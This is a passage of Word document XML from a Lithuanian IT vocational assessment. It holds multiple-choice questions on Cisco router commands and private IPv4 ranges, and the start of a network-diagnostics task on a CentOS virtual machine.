      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE4B0E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atsa</w:t>
      </w:r>
      <w:r w:rsidR="00736F48" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rgin</w:t>
      </w:r>
      <w:r w:rsidR="00233D97" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ę</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00736F48" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>kopij</w:t>
      </w:r>
      <w:r w:rsidR="00233D97" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidR="00C014A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="00233D97" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5638044C" w14:textId="10420B92" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="7ECBB8BB" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">A) </w:t>
      </w:r>
      <w:r w:rsidR="00BC3B72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008C3376" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>opy tftp: flash</w:t>
      </w:r>
      <w:r w:rsidR="05A516AB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A83C23F" w14:textId="50C28E6B" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="7ECBB8BB" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">B) </w:t>
      </w:r>
      <w:r w:rsidR="00BC3B72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008C3376" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>opy running-config tftp</w:t>
      </w:r>
      <w:r w:rsidR="409ED890" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4693E837" w14:textId="52DE896B" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="7ECBB8BB" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">C) </w:t>
      </w:r>
      <w:r w:rsidR="00BC3B72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008C3376" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>opy tftp: startup config</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C21E9D3" w14:textId="70F3731C" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="3B95156D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17F99077" w14:textId="01973393" w:rsidR="00233D97" w:rsidRPr="005A5C28" w:rsidRDefault="7ECBB8BB" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">9. </w:t>
      </w:r>
      <w:r w:rsidR="00C014A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="00B94489" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>uri</w:t>
      </w:r>
      <w:r w:rsidR="00C014A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> komanda pateikia informaciją apie maršrutus Cisco maršrutizatoriuje?</w:t>
      </w:r>
      <w:r w:rsidR="00233D97" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2457BB96" w14:textId="3E4AB2F3" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="7ECBB8BB" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">A) </w:t>
      </w:r>
      <w:r w:rsidR="00BC3B72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008C3376" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>how ip route</w:t>
      </w:r>
      <w:r w:rsidR="1A5764CB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11117E4F" w14:textId="52BFEF64" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="7ECBB8BB" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">B) </w:t>
      </w:r>
      <w:r w:rsidR="00BC3B72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008C3376" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>how ip routing</w:t>
      </w:r>
      <w:r w:rsidR="3E12CFE9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356E5506" w14:textId="284FA460" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="7ECBB8BB" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">C) </w:t>
      </w:r>
      <w:r w:rsidR="00BC3B72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008C3376" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>how route</w:t>
      </w:r>
      <w:r w:rsidR="30132296" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744DD0B6" w14:textId="01F60108" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20A23B83" w14:textId="29F736AD" w:rsidR="00233D97" w:rsidRPr="005A5C28" w:rsidRDefault="29C574F1" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="20EA11F6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00233D97" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kurie iš išvardintų</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1B806B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IP adresų blok</w:t>
      </w:r>
      <w:r w:rsidR="00233D97" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ų</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1B806B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>yra skirti priva</w:t>
      </w:r>
      <w:r w:rsidR="008C3376" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tiems</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1B806B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tinkl</w:t>
      </w:r>
      <w:r w:rsidR="008C3376" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ams</w:t>
      </w:r>
      <w:r w:rsidR="00233D97" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="00233D97" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1E1AD8" w14:textId="352F9318" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="1B806B53" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16</w:t>
      </w:r>
      <w:r w:rsidR="6546AF7E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7765325E" w14:textId="469B3159" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="1B806B53" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>224.0.0.0/4, 192.0.2.0/24</w:t>
      </w:r>
      <w:r w:rsidR="56F2E6F5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D74E127" w14:textId="2AFD13B1" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="1B806B53" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>100.64.0.0/10</w:t>
      </w:r>
      <w:r w:rsidR="7FD9E484" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BB100A" w14:textId="77777777" w:rsidR="000D1AA4" w:rsidRPr="005A5C28" w:rsidRDefault="000D1AA4" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F444AB8" w14:textId="47EE7590" w:rsidR="5C220866" w:rsidRPr="005A5C28" w:rsidRDefault="56BADB41" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Modulis „Informacinės sistemos problemų valdymas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B870457" w14:textId="78F094A2" w:rsidR="171451CB" w:rsidRPr="005A5C28" w:rsidRDefault="171451CB" w:rsidP="000917AE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5370D9D4" w14:textId="0A1390C9" w:rsidR="274A4204" w:rsidRPr="005A5C28" w:rsidRDefault="677580BF" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>1 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="687B7453" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>NAUDOTI IS DIAGNOSTINES PRIEMONES IR ĮRANKIUS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CFE56A" w14:textId="67175976" w:rsidR="274A4204" w:rsidRPr="005A5C28" w:rsidRDefault="48C77024"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 xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidR="0035577D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Į</w:t>
      </w:r>
      <w:r w:rsidR="2454A050" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">diegtoje </w:t>
      </w:r>
      <w:r w:rsidR="5F546627" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>virtualioje mašinoje</w:t>
      </w:r>
      <w:r w:rsidR="1D808C78" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (VirtualBox)</w:t>
      </w:r>
      <w:r w:rsidR="2454A050" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> C</w:t>
      </w:r>
      <w:r w:rsidR="00653FB1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ent</w:t>
      </w:r>
      <w:r w:rsidR="2454A050" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">OS </w:t>
      </w:r>
      <w:r w:rsidR="5D8ECB35" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>operacinėje</w:t>
      </w:r>
      <w:r w:rsidR="2454A050" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> sistemoje</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1CB1F12B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>atlik</w:t>
      </w:r>
      <w:r w:rsidR="008C3376" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">ite </w:t>
      </w:r>
      <w:r w:rsidR="1CB1F12B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>tinklo diagnostiką tinklo įrankiais.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00233D97" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Glaustai a</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>prašy</w:t>
      </w:r>
      <w:r w:rsidR="008C3376" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00AF507C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="66D648FD" w:rsidRPr="005A5C28">
        <w:rPr>
